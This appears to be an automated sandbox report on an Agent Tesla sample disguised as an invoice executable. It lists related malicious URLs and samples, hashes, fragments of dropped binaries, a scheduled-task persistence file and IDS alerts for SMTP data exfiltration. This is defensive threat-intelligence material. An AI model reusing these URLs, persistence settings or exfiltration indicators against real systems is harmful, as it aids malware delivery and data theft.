                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                AS-26496-GO-DADDY-COM-LLCUShttp://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ==Get hashmaliciousBrowse
                                                                                • 107.180.40.120
                                                                                Technical Specifications & Drawings.exeGet hashmaliciousBrowse
                                                                                • 184.168.107.80
                                                                                botx.mipsGet hashmaliciousBrowse
                                                                                • 192.186.201.194
                                                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                                                • 50.62.89.58
                                                                                SecuriteInfo.com.Variant.Lazy.207585.8857.exeGet hashmaliciousBrowse
                                                                                • 192.186.233.163
                                                                                https://hivnd.com/gmt.jsGet hashmaliciousBrowse
                                                                                • 184.168.104.171
                                                                                http://5555882333322111.sharepointdeeplinkreviewdocx.com/Get hashmaliciousBrowse
                                                                                • 72.167.58.252
                                                                                http://148.66.136.3Get hashmaliciousBrowse
                                                                                • 148.66.145.139
                                                                                Singed Docments.exeGet hashmaliciousBrowse
                                                                                • 184.168.102.151
                                                                                Versanddetails.exeGet hashmaliciousBrowse
                                                                                • 104.238.70.184
                                                                                http://hivnd.comGet hashmaliciousBrowse
                                                                                • 184.168.104.171
                                                                                https://hivnd.com/thumpxcache/Get hashmaliciousBrowse
                                                                                • 184.168.104.171
                                                                                https://hivnd.com/gmt.jsGet hashmaliciousBrowse
                                                                                • 184.168.104.171
                                                                                UPDATED SOA.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                NHPUWUJUFDLFFTSGRWJKA.VBSGet hashmaliciousBrowse
                                                                                • 107.180.27.238
                                                                                HWQYKIYQXULHHADVTCBZV.VBSGet hashmaliciousBrowse
                                                                                • 107.180.27.238
                                                                                http://x4r.rfp-inc.cam/Get hashmaliciousBrowse
                                                                                • 184.168.120.159
                                                                                AmatuneMusicConverter.exeGet hashmaliciousBrowse
                                                                                • 72.167.52.84
                                                                                https://vipguestinvites.com/s/CHAMBERLIN22/gsx_2022Get hashmaliciousBrowse
                                                                                • 148.72.108.121
                                                                                Purchase Order (2).exeGet hashmaliciousBrowse
                                                                                • 184.168.102.151

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Roaming\kECjS\kECjS.exeBANK COPY.exeGet hashmaliciousBrowse
                                                                                  new artwork.exeGet hashmaliciousBrowse
                                                                                    new artwork.exeGet hashmaliciousBrowse
                                                                                      Processed payment.exeGet hashmaliciousBrowse
                                                                                        BANK COPY.exeGet hashmaliciousBrowse
                                                                                          PO CPWPKL-1901088.exeGet hashmaliciousBrowse
                                                                                            UPDATED SOA.exeGet hashmaliciousBrowse
                                                                                              Ordem de Compra pdf QD2y.exeGet hashmaliciousBrowse
                                                                                                INVOICE.exeGet hashmaliciousBrowse
                                                                                                  xox.exeGet hashmaliciousBrowse
                                                                                                    payment.exeGet hashmaliciousBrowse
                                                                                                      payment.exeGet hashmaliciousBrowse
                                                                                                        REMINDER 1.exeGet hashmaliciousBrowse
                                                                                                          Offer for sale.exeGet hashmaliciousBrowse
                                                                                                            purchase order.exeGet hashmaliciousBrowse
                                                                                                              Offer for sale.exeGet hashmaliciousBrowse
                                                                                                                svbhjvUpxT.exeGet hashmaliciousBrowse
                                                                                                                  SHIPMENT DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                    g0t8s6FogF.exeGet hashmaliciousBrowse
                                                                                                                      QUATION.exeGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE OUTSTANDING.exe.log

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1216
                                                                                                                        Entropy (8bit):5.355304211458859
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                                                        Malicious:true
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kECjS.exe.log

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):142
                                                                                                                        Entropy (8bit):5.090621108356562
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                                                                        MD5:8C0458BB9EA02D50565175E38D577E35
                                                                                                                        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                                                                        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                                                                        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp69D2.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1642
                                                                                                                        Entropy (8bit):5.1822034700146205
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJYtn:cbh47TlNQ//rydbz9I3YODOLNdq3S
                                                                                                                        MD5:2B04C027DCB9FF6FBBB8566586DA0617
                                                                                                                        SHA1:A349F8FD51F9D28B0F35CEDD9FFA14A608C419B6
                                                                                                                        SHA-256:E0C5C7F2EAC8081C8BF375CE293F7426421D9EDB7873ADFD14B3D851B7208252
                                                                                                                        SHA-512:15B6E73A6D0ED9F862D331AA04E76302DC905FF9D9022AE883B17F598BB7919913F44771807CBA1830035646E23031993D1DED132E807CC60321DB33435B9AC9
                                                                                                                        Malicious:true
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                                                                        C:\Users\user\AppData\Roaming\ahgeNfsrA.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1031168
                                                                                                                        Entropy (8bit):7.486735500072679
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                                                                                                        MD5:0FA9D94D6393235F67A17B220902DBFA
                                                                                                                        SHA1:3C0AE56AB072F622DA13806B4336F01F7137EE4C
                                                                                                                        SHA-256:65EA111F533E1283B202B87434EA207410C1680EADC9B2193C76179EB87DECFC
                                                                                                                        SHA-512:1C2D817ADDC45161E63667895E1C54306E5F8F27F4804D6D7A06163B62451B3189E7FA6608B24BB7DD8969B23285286E82750351F1322B2714A31546FAB9B5C5
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................8.......H.......8~..\H..............p.............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0..<........~.....(,.....,!r...p.....(-...o....s/............~.....+..*.0...........~.....+..*".......*.0..&........(....r5..p~....o0...(1.....t$....+..*...0..&........(....rC..p~....o0...(1.....

                                                                                                                        C:\Users\user\AppData\Roaming\kECjS\kECjS.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):45152
                                                                                                                        Entropy (8bit):6.149629800481177
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                                                                        MD5:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                                                                        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                                                                        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: BANK COPY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: new artwork.exe, Detection: malicious, Browse
                                                                                                                        • Filename: new artwork.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Processed payment.exe, Detection: malicious, Browse
                                                                                                                        • Filename: BANK COPY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: PO CPWPKL-1901088.exe, Detection: malicious, Browse
                                                                                                                        • Filename: UPDATED SOA.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Ordem de Compra pdf QD2y.exe, Detection: malicious, Browse
                                                                                                                        • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                                                        • Filename: xox.exe, Detection: malicious, Browse
                                                                                                                        • Filename: payment.exe, Detection: malicious, Browse
                                                                                                                        • Filename: payment.exe, Detection: malicious, Browse
                                                                                                                        • Filename: REMINDER 1.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Offer for sale.exe, Detection: malicious, Browse
                                                                                                                        • Filename: purchase order.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Offer for sale.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svbhjvUpxT.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SHIPMENT DOCUMENT.exe, Detection: malicious, Browse
                                                                                                                        • Filename: g0t8s6FogF.exe, Detection: malicious, Browse
                                                                                                                        • Filename: QUATION.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                                                                        C:\Windows\System32\drivers\etc\hosts

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):835
                                                                                                                        Entropy (8bit):4.694294591169137
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                                                                        MD5:6EB47C1CF858E25486E42440074917F2
                                                                                                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                                                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                                                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                                                                        Malicious:true
                                                                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                                                                                        \Device\ConDrv

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1141
                                                                                                                        Entropy (8bit):4.44831826838854
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                                                                        MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                                                                        SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                                                                        SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                                                                        SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                                                                        Malicious:false
                                                                                                                        Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Entropy (8bit):7.486735500072679
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                        File name:INVOICE OUTSTANDING.exe
                                                                                                                        File size:1031168
                                                                                                                        MD5:0fa9d94d6393235f67a17b220902dbfa
                                                                                                                        SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
                                                                                                                        SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
                                                                                                                        SHA512:1c2d817addc45161e63667895e1c54306e5f8f27f4804d6d7a06163b62451b3189e7fa6608b24bb7dd8969b23285286e82750351f1322b2714a31546fab9b5c5
                                                                                                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                                                                                                        TLSH:2D25E0A069EC715AE03912B132F064EA57F6AC37C914D22C7D96B76F87B3EC100A3593
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:f9c9a99884c2d218

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4ce656
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x62F102BE [Mon Aug 8 12:34:06 2022 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xce6040x4f.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x2ee1c.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000xc.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x20000xcc65c0xcc800False0.8614224384932763data7.770423052382821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0xd00000x2ee1c0x2f000False0.3779141040558511data5.52480890734526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x1000000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0xd02b00x6e15PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                        RT_ICON0xd70c80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                                                        RT_ICON0xe78f00x94a8data
                                                                                                                        RT_ICON0xf0d980x5488data
                                                                                                                        RT_ICON0xf62200x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 2130706432
                                                                                                                        RT_ICON0xfa4480x25a8data
                                                                                                                        RT_ICON0xfc9f00x10a8data
                                                                                                                        RT_ICON0xfda980x988data
                                                                                                                        RT_ICON0xfe4200x468GLS_BINARY_LSB_FIRST
                                                                                                                        RT_GROUP_ICON0xfe8880x84data
                                                                                                                        RT_VERSION0xfe90c0x324data
                                                                                                                        RT_MANIFEST0xfec300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        192.168.2.343.255.154.57497635872839723 08/08/22-20:20:11.732977TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49763587192.168.2.343.255.154.57
                                                                                                                        192.168.2.343.255.154.57497635872851779 08/08/22-20:20:11.733160TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49763587192.168.2.343.255.154.57
                                                                                                                        192.168.2.343.255.154.57497635872840032 08/08/22-20:20:11.733160TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249763587192.168.2.343.255.154.57
                                                                                                                        192.168.2.343.255.154.57497635872030171 08/08/22-20:20:11.732977TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49763587192.168.2.343.255.154.57

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Aug 8, 2022 20:20:08.485892057 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:08.739192009 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:08.739322901 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:09.421390057 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:09.421747923 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:09.675313950 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:09.759871006 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:09.849378109 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:10.103190899 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:10.117631912 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:10.390836954 CEST5874976343.255.154.57192.168.2.3
